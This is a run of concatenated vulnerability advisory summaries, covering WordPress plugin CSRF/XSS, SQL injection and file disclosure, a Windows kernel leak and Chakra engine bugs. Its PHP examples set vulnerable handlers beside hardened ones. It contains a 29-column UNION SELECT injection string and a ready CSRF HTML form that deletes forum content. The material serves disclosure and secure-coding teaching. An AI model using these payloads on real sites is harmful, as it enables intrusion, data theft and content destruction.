The plugin registers the AJAX action `cms_tpv_add_page`, handled by the function `cms_tpv_add_page()`. The handler performs no nonce (anti-CSRF) verification and no capability check. Because the action is registered as a privileged one it is reachable only by logged-in users, but the missing capability check means any authenticated user, regardless of role, can call it and create arbitrary posts. Combined with CSRF, an attacker can turn this into persistent XSS if the victim holds administrative rights (see PoC).
The plugin registers the AJAX action `acx_asmw_saveorder`, handled by the function `acx_asmw_saveorder_callback()`. The handler performs no nonce (anti-CSRF) verification, so a malicious actor can trick an authenticated user into updating the plugin-specific option `social_widget_icon_array_order`. Because the stored value is later output on the plugin's settings page, the CSRF can be chained into persistent XSS (see PoC): the payload executes when a user with sufficient privileges visits `wp-admin/admin.php?page=Acurax-Social-Widget-Settings`.
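The two advisories above share one root cause: a privileged WordPress AJAX callback that trusts the request because the caller is logged in. The following is an added example, not code from either plugin, showing that pattern beside a hardened handler. The action name `example_save_order`, the option `example_icon_order` and the capability `manage_options` are assumptions; the same three checks (nonce, capability, input validation) apply equally to a handler that creates pages, with the capability swapped for one such as `publish_pages`.

```php
<?php
// Added example (not the plugins' own code). Action, option and
// capability names are hypothetical.

// --- Vulnerable pattern ------------------------------------------------
// wp_ajax_* callbacks run only for logged-in users, but nothing here
// checks WHO is logged in (capability) or whether THEY meant to send the
// request (nonce). A subscriber can call it directly; any third-party
// page can CSRF an administrator into calling it.
add_action( 'wp_ajax_example_save_order', 'example_save_order_vulnerable' );
function example_save_order_vulnerable() {
    // Raw POST data written straight into an option that the settings
    // page later echoes: CSRF -> stored XSS for whoever views that page.
    update_option( 'example_icon_order', $_POST['order'] );
    wp_die();
}

// --- Hardened pattern --------------------------------------------------
// The settings page embeds a nonce bound to this action (for instance via
// wp_localize_script()) and sends it back as the `nonce` POST field:
//   $nonce = wp_create_nonce( 'example_save_order' );
add_action( 'wp_ajax_example_save_order', 'example_save_order_hardened' );
function example_save_order_hardened() {
    // 1. CSRF: the request must carry a nonce minted for this action.
    //    check_ajax_referer() terminates the request with -1 on mismatch.
    check_ajax_referer( 'example_save_order', 'nonce' );

    // 2. Authorization: being logged in is not enough; require the
    //    capability that governs this plugin's settings.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'insufficient privileges', 403 );
    }

    // 3. Input validation: accept only the shape we expect (a list of
    //    slugs), so nothing script-like is ever stored.
    $order = isset( $_POST['order'] ) ? (array) $_POST['order'] : array();
    $order = array_values( array_filter( array_map( 'sanitize_key', $order ) ) );

    update_option( 'example_icon_order', $order );
    wp_send_json_success( $order );
}

// 4. Output escaping on the settings page, so even a value that reached
//    the database by another route cannot execute as script.
function example_render_order() {
    foreach ( (array) get_option( 'example_icon_order', array() ) as $slug ) {
        echo '<li>' . esc_html( $slug ) . '</li>';
    }
}
```

The order of checks matters: the nonce check runs first because it costs nothing and rejects cross-site requests before any authorization logic or input handling is reached. A nonce alone would not have fixed the first advisory, since a low-privileged user can obtain a valid nonce from their own session; the capability check is what stops that path.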
The Wachipi WP Events Calendar plugin 1.0 for WordPress is vulnerable to SQL injection via the `event_id` parameter of `event.php`. The query can be exploited with a UNION SELECT of 29 columns; columns 2 and 25 are reflected in the response and can be used for information gathering.
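An added example, not the plugin's own code, of the kind of lookup that makes the 29-column UNION above possible, beside the parameterized form that closes it. The table name `{$wpdb->prefix}events` and the function names are assumptions.

```php
<?php
// Added example (not the plugin's own code). Table and function names
// are hypothetical.

// --- Vulnerable pattern ------------------------------------------------
// The parameter is concatenated into the SQL. An event_id such as
//   -1 UNION SELECT 1,2,3,...,29-- -
// (29 columns, matching the plugin's SELECT list) turns the lookup into a
// read of any table; whichever columns the template echoes (2 and 25 in
// the advisory) carry the attacker's chosen data back to the browser.
function wpec_get_event_vulnerable( $event_id ) {
    global $wpdb;
    return $wpdb->get_row(
        "SELECT * FROM {$wpdb->prefix}events WHERE event_id = " . $event_id
    );
}

// --- Hardened pattern --------------------------------------------------
function wpec_validate_event_id( $event_id ) {
    // 1. Type-enforce at the edge: an event id is a positive integer and
    //    nothing else. FILTER_VALIDATE_INT rejects the whole string if it
    //    carries a trailing UNION, quote or comment sequence, unlike a
    //    plain (int) cast, which would silently keep the leading -1.
    return filter_var(
        $event_id,
        FILTER_VALIDATE_INT,
        array( 'options' => array( 'min_range' => 1 ) )
    );
}

function wpec_get_event_hardened( $event_id ) {
    global $wpdb;
    $id = wpec_validate_event_id( $event_id );
    if ( false === $id ) {
        return null;
    }
    // 2. Parameterize: %d is cast to int and bound by $wpdb->prepare(),
    //    so client input can never alter the statement's structure.
    $sql = $wpdb->prepare(
        "SELECT * FROM {$wpdb->prefix}events WHERE event_id = %d",
        $id
    );
    return $wpdb->get_row( $sql );
}

// Check a tester would run against the validator: the advisory's payload
// is rejected outright, a genuine id passes.
$payload = '-1 UNION SELECT ' . implode( ',', range( 1, 29 ) ) . '-- -';
var_dump( wpec_validate_event_id( $payload ) ); // bool(false)
var_dump( wpec_validate_event_id( '42' ) );     // int(42)
```

Either step alone closes the injection; both are kept because the validation gives a clean 404 for junk input while the prepared statement protects the query even if a later refactor bypasses the validator.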
`downloads.php` can be reached by unauthenticated users and serves whatever path is supplied in the `file` GET parameter, with no restriction to an intended directory. An unauthenticated attacker can therefore disclose arbitrary files from the server, including `wp-config.php`.
A vulnerability in the `nt!NtQuerySystemInformation` system call with information class 138 can be exploited to disclose portions of uninitialized kernel pool memory to user-mode clients. The root cause is that the internal `nt!ExpQueryMemoryTopologyInformation` function does not fully initialize the output buffer. On 32-bit Windows 10 version 1709, the output is 0x70 (112) bytes long, of which 12 bytes, in three 4-byte chunks, are left uninitialized and contain leftover kernel pool data. The issue can be reproduced by running a proof-of-concept program on a system with the Special Pools mechanism enabled for ntoskrnl.exe.
Chakra fails to detect that `tmp` escapes its scope and therefore allocates it on the stack, which can lead to dereferencing uninitialized stack values. In the proof-of-concept, `tmp` is stack-allocated when the function `opt()` is called, and is then dereferenced when the function `main()` is called, yielding uninitialized stack data.
Chakra, the JavaScript engine in Microsoft Edge, contains an out-of-bounds read. The bug is triggered when a variable is initialized with a double constant but the lookup in the double constant table fails to find the corresponding int value; the resulting out-of-bounds read can be exploited to disclose sensitive information.
This vulnerability occurs when optimizations of memory operations leave behind empty loops whose removal breaks the control flow. In the PoC, the empty loop is removed without accounting for the branches around it, so the program prints 1234 instead of 0. An attacker can exploit this to cause unexpected behavior in the program.
A vulnerability exists in the `JavascriptMath::MaxInAnArray` optimization method, which takes the original `Math.max` method as its first parameter and the arguments object as its second. If the arguments object cannot be handled by the method, it explicitly calls the original `Math.max`. However, it does not check whether the `Math.max` property has been changed, so a user-defined JavaScript function can be called without `ImplicitCallFlags` being updated.
Any registered user can delete topics and comments in the forum without having admin access. Save the code below as an HTML file and, once the victim is logged into their account, have them open it. <form method="post" action="https://www.site.com/forum/vanilla/discussion/dismissannouncement?discussionid=3709"><input name="DeliveryType" value="VIEW" class="input" type="hidden"><input name="DeliveryMethod" value="JSON" class="input" type="hidden"><input value="Send" class="submit" type="submit"></form>